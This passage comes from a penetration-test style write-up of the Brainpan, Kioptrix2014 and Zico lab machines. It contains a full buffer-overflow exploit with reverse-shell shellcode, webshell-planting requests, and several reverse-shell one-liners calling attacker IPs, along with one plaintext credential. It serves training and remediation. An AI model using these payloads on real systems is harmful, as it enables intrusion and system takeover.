::1/128 scope host 127 | valid_lft forever preferred_lft forever 128 | 2: eth0: mtu 1500 qdisc pfifo_fast state UNKNOWN qlen 1000 129 | link/ether 00:0c:29:da:50:81 brd ff:ff:ff:ff:ff:ff 130 | inet 10.0.0.138/24 brd 10.0.0.255 scope global eth0 131 | inet6 fe80::20c:29ff:feda:5081/64 scope link 132 | valid_lft forever preferred_lft forever 133 | 3: eth1: mtu 1500 qdisc noop state DOWN qlen 1000 134 | link/ether 00:0c:29:da:50:8b brd ff:ff:ff:ff:ff:ff 135 | ``` 136 | 137 | ### Credentials 138 | 139 | ```plaintext 140 | N/A 141 | ``` 142 | 143 | ### Exploitation and proof 144 | 145 | #### Initial access 146 | 147 | ##### Vulnerability exploitation 148 | 149 | Nmap finds two non-default services. Port 9999 seems to be running a terminal application, but we need a password to access it. 150 | 151 | ``` 152 | # nc 10.0.0.138 9999 153 | _| _| 154 | _|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_| 155 | _| _| _|_| _| _| _| _| _| _| _| _| _| _| _| 156 | _| _| _| _| _| _| _| _| _| _| _| _| _| _| 157 | _|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _| 158 | _| 159 | _| 160 | 161 | [________________________ WELCOME TO BRAINPAN _________________________] 162 | ENTER THE PASSWORD 163 | 164 | >> hello 165 | ACCESS DENIED 166 | ``` 167 | 168 | Port 10000 is identified as `SimpleHTTPServer`, and browsing to it it seems to return a banner image on safe coding practices. Enumerating subfolders the webserver with `gobuster`, we find `/bin` which is listable and contains `brainpan.exe`. Let's analyze this application! 169 | 170 | ``` 171 | # gobuster dir -u http://10.0.0.138 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 172 | /bin (Status: 301) 173 | ``` 174 | 175 | We load the binary to our windows VM and start fuzzing it. We find that if we send 1000 "A" characters as our password, the application hangs. Inspecting it in our debugging application (Unity debugger) we find that we have overwritten the stack, including `EIP`! 176 | 177 | ![a7b7b9d025ee7b2331b0360b7f1a60eb.png](_resources/bd626d2837644bc5908d1a10c044bc61.png) 178 | 179 | ``` 180 | msf-pattern_create -l 1000 181 | ``` 182 | 183 | We then send that string as our password, and see that the EIP is overwritten with the value `35724134`. We can now identify the offset as follows. 184 | 185 | ``` 186 | # msf-pattern_offset -l 1000 -q 35724134 187 | [*] Exact match at offset 524 188 | ``` 189 | 190 | This would imply that we *exactly* overwrite `EIP` if we send 524 "A" characters and 4 "B" characters. Doing exactly that, we indeed manage to overwrite `EIP` with precision. 191 | 192 | ![3fccedb5d57ec60e0ed35b3f6b4cf1df.png](_resources/43674b8c9f7f41ea8785d605952406e6.png) 193 | 194 | Now, we send an array of the binary characters ranging from `\x01` to `\xff` in our buffer, to identify bad characters. Inspecting the characters in our buffer, none seem to have disappeared or caused issues in the buffer. As such, our only bad character is `\x00`, which we already removed. 195 | 196 | Now to generate a payload. For our test system, we generate the following payload. Note that once we deploy it on the target, we need to replace this payload with one generated with a different `LHOST` address. 197 | 198 | ``` 199 | msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.155 LPORT=443 EXITFUNC=thread -f py -b "\x00" 200 | ``` 201 | 202 | This results in a big payload, which we include in our script. We prepend several `\x90` (NOP) characters to ensure the payload is triggered correctly. 203 | 204 | Finally, we have to find a `JMP ESP` or `CALL ESP` instruction to instruct the program to actually execute our payload. Using `msf-nasm_shell` to find the respective opcodes, we find that we can use `FFE4` or `FFD4`. 205 | 206 | ``` 207 | # msf-nasm_shell 208 | nasm > jmp esp 209 | 00000000 FFE4 jmp esp 210 | nasm > call esp 211 | 00000000 FFD4 call esp 212 | ``` 213 | 214 | We can find memory addresses with these instructions in our debugger, using the `mona.py` plugin. First, we run `!mona modules` to identify an unprotected module. 215 | 216 | ![2917175e6f9be3d4ce5f8045ad575d14.png](_resources/1d0f9156e6ad477da9dafc9eb736b5f4.png) 217 | 218 | We find that we can use the binary itself (`brainpan.exe`), since it doesn't have any protections. Using this information, we run the following query to locate `jmp esp` instructions in memory! 219 | 220 | ``` 221 | !mona find -s '\xff\xe4' -m brainpan.exe 222 | ``` 223 | 224 | We find one address: `0x311712f3`. This doesn't contain any bad characters, so should be usable. We update our `EIP` overwrite in our script to the Little Endian notation of that address, which is `"\xf3\x12\x17\x31"`. We are now ready to try our exploit. 225 | 226 | Running the exploit on our test machine, we get a shell back! 227 | 228 | ![20ae0f542aec4372a4ddf58375ea0835.png](_resources/78f9b63a3ff44b8dbddeb34bb174f469.png) 229 | 230 | Perfect. Now we only have to re-generate our payload and replace our target IP address to weaponize the exploit. 231 | 232 | ``` 233 | msfvenom -p windows/shell_reverse_tcp LHOST=10.0.100.108 LPORT=443 EXITFUNC=thread -f py -b "\x00" 234 | ``` 235 | 236 | The final exploit code is as follows: 237 | 238 | ```python 239 | #!/usr/bin/env python 240 | 241 | import socket 242 | 243 | target = "10.0.0.138" 244 | port = 9999 245 | 246 | # badchars: \x00 247 | 248 | buf = b"" 249 | buf += b"\xbf\xb0\x6b\xdc\x19\xdb\xd7\xd9\x74\x24\xf4\x5d\x29" 250 | buf += b"\xc9\xb1\x52\x83\xc5\x04\x31\x7d\x0e\x03\xcd\x65\x3e" 251 | buf += b"\xec\xd1\x92\x3c\x0f\x29\x63\x21\x99\xcc\x52\x61\xfd" 252 | buf += b"\x85\xc5\x51\x75\xcb\xe9\x1a\xdb\xff\x7a\x6e\xf4\xf0" 253 | buf += b"\xcb\xc5\x22\x3f\xcb\x76\x16\x5e\x4f\x85\x4b\x80\x6e" 254 | buf += b"\x46\x9e\xc1\xb7\xbb\x53\x93\x60\xb7\xc6\x03\x04\x8d" 255 | buf += b"\xda\xa8\x56\x03\x5b\x4d\x2e\x22\x4a\xc0\x24\x7d\x4c" 256 | buf += b"\xe3\xe9\xf5\xc5\xfb\xee\x30\x9f\x70\xc4\xcf\x1e\x50" 257 | buf += b"\x14\x2f\x8c\x9d\x98\xc2\xcc\xda\x1f\x3d\xbb\x12\x5c" 258 | buf += b"\xc0\xbc\xe1\x1e\x1e\x48\xf1\xb9\xd5\xea\xdd\x38\x39" 259 | buf += b"\x6c\x96\x37\xf6\xfa\xf0\x5b\x09\x2e\x8b\x60\x82\xd1" 260 | buf += b"\x5b\xe1\xd0\xf5\x7f\xa9\x83\x94\x26\x17\x65\xa8\x38" 261 | buf += b"\xf8\xda\x0c\x33\x15\x0e\x3d\x1e\x72\xe3\x0c\xa0\x82" 262 | buf += b"\x6b\x06\xd3\xb0\x34\xbc\x7b\xf9\xbd\x1a\x7c\xfe\x97" 263 | buf += b"\xdb\x12\x01\x18\x1c\x3b\xc6\x4c\x4c\x53\xef\xec\x07" 264 | buf += b"\xa3\x10\x39\x87\xf3\xbe\x92\x68\xa3\x7e\x43\x01\xa9" 265 | buf += b"\x70\xbc\x31\xd2\x5a\xd5\xd8\x29\x0d\xd0\x1c\x55\xa1" 266 | buf += b"\x8c\x1e\x95\x38\xf6\x96\x73\x50\x18\xff\x2c\xcd\x81" 267 | buf += b"\x5a\xa6\x6c\x4d\x71\xc3\xaf\xc5\x76\x34\x61\x2e\xf2" 268 | buf += b"\x26\x16\xde\x49\x14\xb1\xe1\x67\x30\x5d\x73\xec\xc0" 269 | buf += b"\x28\x68\xbb\x97\x7d\x5e\xb2\x7d\x90\xf9\x6c\x63\x69" 270 | buf += b"\x9f\x57\x27\xb6\x5c\x59\xa6\x3b\xd8\x7d\xb8\x85\xe1" 271 | buf += b"\x39\xec\x59\xb4\x97\x5a\x1c\x6e\x56\x34\xf6\xdd\x30" 272 | buf += b"\xd0\x8f\x2d\x83\xa6\x8f\x7b\x75\x46\x21\xd2\xc0\x79" 273 | buf += b"\x8e\xb2\xc4\x02\xf2\x22\x2a\xd9\xb6\x43\xc9\xcb\xc2" 274 | buf += b"\xeb\x54\x9e\x6e\x76\x67\x75\xac\x8f\xe4\x7f\x4d\x74" 275 | buf += b"\xf4\x0a\x48\x30\xb2\xe7\x20\x29\x57\x07\x96\x4a\x72" 276 | 277 | buffer = "A" * 524 278 | buffer += "\xf3\x12\x17\x31" 279 | buffer += "\x90" * 32 + buf 280 | 281 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 282 | sock.connect((target,port)) 283 | print (sock.recv(1024)) 284 | sock.send(buffer) 285 | print (sock.recv(1024)) 286 | sock.close() 287 | ``` 288 | 289 | Running the exploit, we get a shell back as user Puck! 290 | 291 | ##### Severity 292 | 293 | `High` - An attacker could identify and exploit this vulnerability to remotely gain code execution on the machine. 294 | 295 | ##### Remediation 296 | 297 | - Patch the `brainpan.exe` binary to properly allocate buffer space and sanitize user inputs 298 | - Limit network access to the machine 299 | 300 | ##### Proof 301 | 302 | ![d66c74dd136d44b2e0b8aa1968f8ee6d.png](_resources/3fcfd682f31f487fa15a1e936f6d54e4.png) 303 | 304 | #### Privilege Escalation 305 | 306 | ##### Vulnerability exploitation 307 | 308 | Oddly enough, our new shell seems to be on Linux filesystem looking at the directories in the root directory. This implies that the Windows binary we found was running via `wine` or a similar emulation environment 309 | 310 | ![3fe07241c0b2ef536ff825e501317e50.png](_resources/cdaf8cd804cf4f6bbb77f0d6f8362f2c.png) 311 | 312 | To prevent confusion and avoid limitations, we can turn this shell into a regular `sh` shell by spawning a new reverse shell with the regular Linux `sh` binary. For that we can run the following from our prompt 313 | 314 | ``` 315 | /bin/sh -i >& /dev/tcp/10.0.0.128/443 0>&1 316 | ``` 317 | 318 | ![af1fcd5da95378a05cc417d6491f1509.png](_resources/7bafa472ec614deabdd9cfca82d1119e.png) 319 | 320 | On our new shell, we can gain a full TTY as follows. 321 | 322 | ``` 323 | /usr/bin/script -qc /bin/bash /dev/null 324 | ``` 325 | 326 | ``` 327 | $ sudo -l 328 | Matching Defaults entries for puck on this host: 329 | env_reset, mail_badpass, 330 | secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin 331 | 332 | User puck may run the following commands on this host: 333 | (root) NOPASSWD: /home/anansi/bin/anansi_util 334 | ``` 335 | 336 | That seems interesting! We cannot read the binary file to see what it does, so let's just run it. 337 | 338 | ``` 339 | $ sudo /home/anansi/bin/anansi_util 340 | Usage: /home/anansi/bin/anansi_util [action] 341 | Where [action] is one of: 342 | - network 343 | - proclist 344 | - manual [command] 345 | ``` 346 | 347 | Interesting, looks like we can run some commands as root using this utility. After some playing around, the `manual` command seems to be the most promising. Running this command opens the manpage of a certain command that we specify as root. 348 | 349 | ``` 350 | $ sudo /home/anansi/bin/anansi_util manual bash 351 | No manual entry for manual 352 | WARNING: terminal is not fully functional 353 | - (press RETURN) 354 | BASH(1) BASH(1) 355 | 356 | NAME 357 | bash - GNU Bourne-Again SHell 358 | 359 | SYNOPSIS 360 | bash [options] [file] 361 | 362 | COPYRIGHT 363 | Bash is Copyright (C) 1989-2011 by the Free Software Foundation, Inc. 364 | 365 | DESCRIPTION 366 | Bash is an sh-compatible command language interpreter that executes 367 | commands read from the standard input or from a file. Bash also incor‐ 368 | porates useful features from the Korn and C shells (ksh and csh). 369 | 370 | Bash is intended to be a conformant implementation of the Shell and 371 | Utilities portion of the IEEE POSIX specification (IEEE Standard 372 | 1003.1). Bash can be configured to be POSIX-conformant by default. 373 | 374 | OPTIONS 375 | All of the single-character shell options documented in the descrip‐ 376 | tion of the set builtin command can be used as options when the shell 377 | Manual page bash(1) line 1 (press h for help or q to quit) 378 | ``` 379 | 380 | This isn't too interesting on itself, but we are dropped into an interactive `less`-like prompt since the content doesn't fit on the screen. As listed [here](https://gtfobins.github.io/gtfobins/man/#sudo), we can run system commands by prepending `!`, giving us command execution as root! 381 | 382 | Running `!bash` at the manpage prompt drops us into a root shell, giving us full access over the system. 383 | 384 | ##### Severity 385 | 386 | `High` - Any user with sudo permissions on the `anansi_util` binary may escalate their privileges to gain full control of the system. 387 | 388 | ##### Remediation 389 | 390 | - Restrict `sudo` access on a least-privilege basis 391 | - Remove or restrict the `manual` functionality within the `anansi_util` binary 392 | 393 | ##### Proof 394 | 395 | ![68784bdfb72a2e608d14a626cd6ed655.png](_resources/e8fa6ab4d5a54bcf8209512d0a54b78c.png) 396 | 397 | ## System IP 10.0.0.139 (Kioptrix2014) 398 | 399 | ### System overview 400 | 401 | | | | 402 | |-------------------|-----------------| 403 | | IP Address | 10.0.0.139 | 404 | | Hostname | Kioptrix2014 | 405 | | Exploitation Date | 04-05-2020 | 406 | | Point Value | N/A | 407 | 408 | ### Exploitation Overview 409 | 410 | This machine required several steps to exploit. First, we identify a Local File Inclusion vulnerability in the `pChart` system on the web server. We use this to read the apache configuration files and identify user-agent based filtering for the web server on port 8080. Once there, we identify the `phptax` application which we can use to gain command execution as user `www`. Since the machine is running FreeBSD version 9, we utilize a kernel exploit to escalate our privileges to root. 411 | 412 | ### Service Enumeration 413 | 414 | #### Portscan - TCP 415 | 416 | ```plaintext 417 | # Nmap 7.80 scan initiated Mon May 4 11:00:08 2020 as: nmap -sV -sC -p- -v -o nmapfull.out 10.0.0.139 418 | Nmap scan report for 10.0.0.139 419 | Host is up (0.00047s latency). 420 | Not shown: 65532 filtered ports 421 | PORT STATE SERVICE VERSION 422 | 22/tcp closed ssh 423 | 80/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8) 424 | | http-methods: 425 | |_ Supported Methods: HEAD 426 | |_http-title: Site doesn't have a title (text/html). 427 | 8080/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8) 428 | |_http-server-header: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8 429 | |_http-title: 403 Forbidden 430 | MAC Address: 00:0C:29:FE:67:D7 (VMware) 431 | 432 | Read data files from: /usr/bin/../share/nmap 433 | Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 434 | # Nmap done at Mon May 4 11:02:18 2020 -- 1 IP address (1 host up) scanned in 129.88 seconds 435 | ``` 436 | 437 | ### Network interfaces 438 | 439 | ```plaintext 440 | em0: flags=8843 metric 0 mtu 1500 441 | options=9b 442 | ether 00:0c:29:fe:67:d7 443 | inet 10.0.0.139 netmask 0xffffff00 broadcast 10.0.0.255 444 | nd6 options=29 445 | media: Ethernet autoselect (1000baseT ) 446 | status: active 447 | plip0: flags=8810 metric 0 mtu 1500 448 | nd6 options=29 449 | lo0: flags=8049 metric 0 mtu 16384 450 | options=3 451 | inet6 ::1 prefixlen 128 452 | inet6 fe80::1%lo0 prefixlen 64 scopeid 0x3 453 | inet 127.0.0.1 netmask 0xff000000 454 | nd6 options=21 455 | ipfw0: flags=8801 metric 0 mtu 65536 456 | nd6 options=21 457 | ``` 458 | 459 | ### Credentials 460 | 461 | ```plaintext 462 | N/A 463 | ``` 464 | 465 | ### Exploitation and proof 466 | 467 | #### Initial access 468 | 469 | ##### Vulnerability exploitation 470 | 471 | Nmap finds two ports open, 80 and 8080. Port 8080 seems to reject all of our requests with an 403 error, and port 80 just returns "It works!". However, by inspecting the source, code, we see a reference to `/pChart2.1.3/index.php`. 472 | 473 | ![ffb80df9362fb3c922d028c49da290b3.png](_resources/5aaf06cbb9f34198ade6738ce59f6c87.png) 474 | 475 | Visiting that page, we get to see the pChart system v2.1.3 without authentication. This version seems to be vulnerable to XSS and Path Traversal, as outlined [here](https://www.exploit-db.com/exploits/31173). Testing out the vulnerabilities for ourselves we can indeed read arbitrary files through the path traversal. For example, we can read `/etc/passwd`. 476 | 477 | ![3124b1f27f3ccc417fc3881795114ecd.png](_resources/8b57d11edb854ab1af23239e63b089ef.png) 478 | 479 | The passwd file also lists we are dealing with FreeBSD 9, which is interesting since this affects the paths we are dealing with. We can find the HTTP access log here, for example. 480 | 481 | ``` 482 | http://10.0.0.139/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fvar/log/httpd-access.log 483 | ``` 484 | 485 | Unfortunately, any PHP that we inject through user agent poisoning doesn't seem to be executed and is reflected back to us. Looks like we'll have to find another way in. Enumerating more files, we find the apache configuration. 486 | 487 | ``` 488 | http://10.0.0.139/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf 489 | ``` 490 | 491 | Near the bottom, it contains some interesting information about the vhost on port `8080`: 492 | 493 | ``` 494 | SetEnvIf User-Agent ^Mozilla/4.0 Mozilla4_browser 495 | 496 | 497 | DocumentRoot /usr/local/www/apache22/data2 498 | 499 | 500 | Options Indexes FollowSymLinks 501 | AllowOverride All 502 | Order allow,deny 503 | Allow from env=Mozilla4_browser 504 | 505 | 506 | 507 | ``` 508 | 509 | In short, it sets an environment variable if our user agent begins with "Mozilla/4.0", and only allows us access if the environment variable is set. AKA, we should be able to bypass the 403 errors on that port if we spoof our user agent! Using the BurpSuite proxy, we can easily spoof our user agent by using the "Match and Replace" feature. 510 | 511 | ![642f8dd49c6bded553bc000cdfb8ae0c.png](_resources/158fecfa36214df8b5c347483a9c4cec.png) 512 | 513 | We can now access the web port 8080, and find a reference to `phptax`. Clicking the link, we access probably the most interesting system since the start of humanity... 514 | 515 | ![e3443fadb57f048d5e1a7ee08931f0a1.png](_resources/74774e33076e4483ac3e35d52b3de13b.png) 516 | 517 | There's several remote code execution vulnerabilities disclosed for this system, but most don't seem too reliable. We finally end up with [this exploit disclosure](https://www.exploit-db.com/exploits/25849), which simply seems to make one web request to place a PHP backdoor. The exploit itself is slightly unreliable, but we can easily extract and recreate the web request to place the webshell. 518 | 519 | ``` 520 | http://10.0.0.139:8080/phptax/index.php?field=rce.php&newvalue=%3C%3Fphp%20passthru(%24_GET%5Bcmd%5D)%3B%3F%3E 521 | ``` 522 | 523 | We can access the webshell at `/phptax/data/rce.php` and inject commands with the `?cmd=` parameter. 524 | 525 | ![d237d4993fd0e89bce2bcf7740e76c4f.png](_resources/ab39cd6410114eae9114e8c1aeca9a64.png) 526 | 527 | Nice! We now have reliable code execution. We can spawn reverse shell by utilizing the netcat binary as follows: `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.128 443 >/tmp/f`. To prevent certain characters from messing up the exploit, we URL-encode the whole payload and visit the following URL to trigger it. 528 | 529 | ``` 530 | http://10.0.0.139:8080/phptax/data/rce.php?cmd=%72%6d%20%2f%74%6d%70%2f%66%3b%6d%6b%66%69%66%6f%20%2f%74%6d%70%2f%66%3b%63%61%74%20%2f%74%6d%70%2f%66%7c%2f%62%69%6e%2f%73%68%20%2d%69%20%32%3e%26%31%7c%6e%63%20%31%30%2e%30%2e%30%2e%31%32%38%20%34%34%33%20%3e%2f%74%6d%70%2f%66 531 | ``` 532 | 533 | Nice, we now have a stable shell as `www`! 534 | 535 | ![26bfb20bdf976426fa1da426a6115b7e.png](_resources/dc7495e481304f8991d3f2b205ed49f3.png) 536 | 537 | ##### Severity 538 | 539 | `High` - Any user with access to the network this machine is on may be able to read sensitive information and/or remotely exploit the machine. 540 | 541 | ##### Remediation 542 | 543 | - Don't rely on user-agents as a security measure. 544 | - Discontinue or update the `pChart` application. 545 | - Discontinue or update the `phptax` application. 546 | 547 | ##### Proof 548 | 549 | #### Privilege Escalation 550 | 551 | ##### Vulnerability exploitation 552 | 553 | A user `www`, we don't seem to find much that is usable for privilege escalation. Since the system is quite old, let's look for kernel exploits. 554 | 555 | ``` 556 | $ uname -a 557 | FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64 558 | ``` 559 | 560 | Looking for exploits for FreeBSD 9, we stumble upon [this exploit](https://www.exploit-db.com/exploits/28718) which seems interesting and relevant for our version. Let's try it out! We grab the source code, transfer it to the target system using `nc`, and compile it using `gcc` on the target (to avoid compiling issues). Running the binary, it drops us into a root shell! Awesome! 561 | 562 | ##### Severity 563 | 564 | `Critical` - Any user on the machine may execute this or similar exploits to gain full control over the machine. 565 | 566 | ##### Remediation 567 | 568 | Patch the operating system to the latest - or at least a more recent - version of FreeBSD. 569 | 570 | ##### Proof 571 | 572 | ![a95dfa6c8b04130cc0e035e71de295b1.png](_resources/2e4416476b68490a8d24e3d7ef51433f.png) 573 | 574 | ### Miscellaneous notes 575 | 576 | The author implemented a nice monitoring feature on the box, confronting with how much noise you make. I generated 35 "level 6" alerts, which would otherwise have had me blocked for 10 minutes each. Phew! 577 | 578 | ![31ca80e6a99a0c083eb47f97fb183b07.png](_resources/d980375a0a284cd699d453a2bb24acbb.png) 579 | 580 | ## System IP 10.0.100.105 (Zico) 581 | 582 | ### System overview 583 | 584 | | | | 585 | |-------------------|-----------------| 586 | | IP Address | 10.0.100.105 | 587 | | Hostname | Zico | 588 | | Exploitation Date | 04-05-2020 | 589 | | Point Value | N/A | 590 | 591 | ### Exploitation Overview 592 | 593 | To exploit this machine we identified `phpLiteAdmin v1.9.3`, which allows us to write arbitrary files to the webserver. We exploit this privilege to write a webshell, which effectively grants us command execution on the server. To escalate our privileges, we abuse our sudo rights on the `tar` binary to spawn an interactive shell as root. 594 | 595 | #### Portscan - TCP 596 | 597 | ```plaintext 598 | PORT STATE SERVICE REASON VERSION 599 | 22/tcp open ssh syn-ack ttl 128 OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0) 600 | | ssh-hostkey: 601 | | 1024 68:60:de:c2:2b:c6:16:d8:5b:88:be:e3:cc:a1:25:75 (DSA) 602 | | ssh-dss AAAAB3NzaC1kc3MAAACBAJwR6q4VerUDe7bLXRL6ZPTXj5FY66he+WWlRSoQppwDLqrTG73Pa9qUHMDFb1LXN1qgg0p0lyfqvm8ZeN+98r 603 | bT0JW6+Wqa7v0K+N82xf87fVkJcXAuU/A8OGR9eVMZmWsIOpabZexd5CHYgLO3k4YpPSdxc6S4zJcOGwXVnmGHAAAAFQDHjsPg0rmkbquTJRdlEZBVJe 604 | 9+3QAAAIBjYIAiGvKhmJfzDjVfzlxRD1ET7ZhSoMDxU0KadwXQP1uBdlYVEteJQpUTEsA+7kFH7xhtZ/zbK2afEFHriAphTJmz8GqkIR5CJXh3dZspdk 605 | 2MHCgxkXl5G/iVPLR9UShN+nsAVxfm0gffCqbqZu3Ridt3JwTXQbiDfXO/a6T/eQAAAIEAlsW/i/dUuFbRVO2zaAKwL/CFWT19Al7+njszC5FCJ2degg 606 | mF/NIKJUbJwkRZkwL4PY1HYj2xqn7ImhPSyvdCd+IFdw73Pndnjv0luDc8i/a4JUEfna4rzXt1Y5c24J1pEoKA05VicyCBD2z6TodRJEVEFSsa1s8s2p 607 | 9x6LxwsDw= 608 | | 2048 50:db:75:ba:11:2f:43:c9:ab:14:40:6d:7f:a1:ee:e3 (RSA) 609 | | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDZt46W9slSN3Y6D2f931rijUPCEewhQWmBfGhybuF4qLftfJMuyFcREZkG6UretVI8ZnQn/OMDgb 610 | f2DYMzKsRLnz7W5cGy1Mt1pWoG0iCgi2xHzLqOqPYo4mP9/hdZT6pANXapETT55yx8sHAYLAa9NK5Dtyv+QNQ2dUUb1wUTCqgYffLVDgoHvNNDwCwB6b 611 | iJf6uopqfg2KXvAzcqSa6oaRChJOXjFlM08HebMwkMSzrOXjWbXhFsONy5JuDf3WztCtLMsFrVRHTdDwTh7uL2UQ8Qcky+kP6Wd7G8NlW5RxubYIFpAM 612 | 0u2SsQIjYOxz+eOfQ8GE3WjvaIBqX05gat 613 | | 256 11:5d:55:29:8a:77:d8:08:b4:00:9b:a3:61:93:fe:e5 (ECDSA) 614 | |_ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFxsiWE3WImfJcjiWS5asOVoMsn+0gFLU5AgPNs2AT 615 | okB7kw00IsB0YGrqClwYNauRRddkYMsi0icJSR60mYNSo= 616 | 80/tcp open http syn-ack ttl 128 Apache httpd 2.2.22 ((Ubuntu)) 617 | | http-methods: 618 | |_ Supported Methods: GET HEAD POST OPTIONS 619 | |_http-server-header: Apache/2.2.22 (Ubuntu) 620 | |_http-title: Zico's Shop 621 | 111/tcp open rpcbind syn-ack ttl 128 2-4 (RPC #100000) 622 | 39881/tcp open status syn-ack ttl 128 1 (RPC #100024) 623 | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 624 | ``` 625 | 626 | ### Network interfaces 627 | 628 | ```plaintext 629 | 1: lo: mtu 16436 qdisc noqueue state UNKNOWN 630 | link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 631 | inet 127.0.0.1/8 scope host lo 632 | inet6 ::1/128 scope host 633 | valid_lft forever preferred_lft forever 634 | 2: eth0: mtu 1500 qdisc pfifo_fast state UP qlen 1000 635 | link/ether 00:0c:29:e2:b0:d1 brd ff:ff:ff:ff:ff:ff 636 | inet 10.0.100.105/24 brd 10.0.100.255 scope global eth0 637 | inet6 fe80::20c:29ff:fee2:b0d1/64 scope link 638 | valid_lft forever preferred_lft forever 639 | ``` 640 | 641 | ### Credentials 642 | 643 | ```plaintext 644 | zico:sWfCsfJSPV9H3AmQzw8 645 | ``` 646 | 647 | ### Exploitation and proof 648 | 649 | #### Initial access 650 | 651 | ##### Vulnerability exploitation 652 | 653 | Nmap finds a handful of ports open, of which SSH and HTTP are most notable. Starting with the HTTP server, we can enumerate several pages and directories on the server. 654 | 655 | ``` 656 | # gobuster dir -u http://10.0.100.105/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html -o gobuster.out 657 | [...] 658 | /index (Status: 200) 659 | /index.html (Status: 200) 660 | /img (Status: 301) 661 | /tools (Status: 200) 662 | /tools.html (Status: 200) 663 | /view (Status: 200) 664 | /view.php (Status: 200) 665 | /css (Status: 301) 666 | /js (Status: 301) 667 | /vendor (Status: 301) 668 | /package (Status: 200) 669 | /LICENSE (Status: 200) 670 | /less (Status: 301) 671 | /server-status (Status: 403) 672 | /dbadmin (Status: 301) 673 | ``` 674 | 675 | The directory `/dbadmin` looks interesting. It has directory listing enabled, which shows us that `test_db.php` exists in that directory. Here, we can login with a default password of `admin` to find `phpLiteAdmin v1.9.3`. This system has a [known vulnerability](https://www.exploit-db.com/exploits/24044) that could allow us to write arbitrary code to PHP files, which will get executed server-side! 676 | 677 | To exploit this vulnerability, we create a new database called `hack.php`, and populate this database with one table that has one column. We configure this column to have the following default value: 678 | 679 | ``` 680 | 681 | ``` 682 | 683 | > Note the double quotes! Single quotes don't work because the payload is already embedded in single quotes by the phpLiteAdmin application. 684 | 685 | In the database settings, we see that our simple webshell is written to `/usr/databases/hack.php`. Unfortunately, we cannot access this directory. We can rename the payload to attempt to specify a new path. 686 | 687 | ![53050bc09b2c873bb4e6146f335fb1e5.png](_resources/dedb017ab57246aab374a65165e16d64.png) 688 | 689 | Looking at the directory listing in `/dbadmin`, it seems to have been written correctly! Now we can visit our page to see if the webshell works correctly. 690 | 691 | ``` 692 | # curl http://10.0.100.105/dbadmin/cmd2.php?cmd=id --output - 693 | Wtable11CREATE TABLE '1' ('e' TEXT default 'uid=33(www-data) gid=33(www-data) groups=33(www-data) 694 | ``` 695 | 696 | In the garbled output we see that our command is interpreted by PHP. Awesome, we have command execution. We send the following request. 697 | ``` 698 | # curl --output - http://10.0.100.105/dbadmin/cmd2.php?cmd=%62%61%73%68%20%2d%63%20%27%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%30%2e%31%30%30%2e%31%30%38%2f%34%34%33%20%30%3e%26%31%27 699 | ``` 700 | 701 | > This is the below in URL-encoded format. 702 | > 703 | > ``` 704 | > bash -c 'bash -i >& /dev/tcp/10.0.100.108/443 0>&1' 705 | > ``` 706 | 707 | We now get a shell back as `www-data` on our listener. 708 | 709 | ##### Severity 710 | 711 | `High` - An attacker with connectivity to the machine may guess the credentials for `phpLiteAdmin` and use the known vulnerability in this system to gain command execution on the machine. 712 | 713 | ##### Remediation 714 | 715 | - Change the default password for `phpLiteAdmin`. 716 | - Limit access to the database where possible. 717 | 718 | ##### Proof 719 | 720 | ![9803287060e167bedf64c355ce888f98.png](_resources/d77016f6a7eb4770a8c82f92392d9ef7.png) 721 | 722 | #### Privilege Escalation 723 | 724 | ##### Vulnerability exploitation 725 | 726 | As `www-data` we have read access to most of Zico's home folder. It looks like he is experimenting with several content management systems. 727 | 728 | ``` 729 | www-data@zico:/home/zico$ ls -la 730 | ls -la 731 | total 9244 732 | drwxr-xr-x 6 zico zico 4096 Jun 19 2017 . 733 | drwxr-xr-x 3 root root 4096 Jun 8 2017 .. 734 | -rw------- 1 zico zico 912 Jun 19 2017 .bash_history 735 | -rw-r--r-- 1 zico zico 220 Jun 8 2017 .bash_logout 736 | -rw-r--r-- 1 zico zico 3486 Jun 8 2017 .bashrc 737 | -rw-r--r-- 1 zico zico 675 Jun 8 2017 .profile 738 | drw------- 2 zico zico 4096 Jun 8 2017 .ssh 739 | -rw------- 1 zico zico 3509 Jun 19 2017 .viminfo 740 | -rw-rw-r-- 1 zico zico 504646 Jun 14 2017 bootstrap.zip 741 | drwxrwxr-x 18 zico zico 4096 Jun 19 2017 joomla 742 | drwxrwxr-x 6 zico zico 4096 Aug 19 2016 startbootstrap-business-casual-gh-pages 743 | -rw-rw-r-- 1 zico zico 61 Jun 19 2017 to_do.txt 744 | drwxr-xr-x 5 zico zico 4096 Jun 19 2017 wordpress 745 | -rw-rw-r-- 1 zico zico 8901913 Jun 19 2017 wordpress-4.8.zip 746 | -rw-rw-r-- 1 zico zico 1194 Jun 8 2017 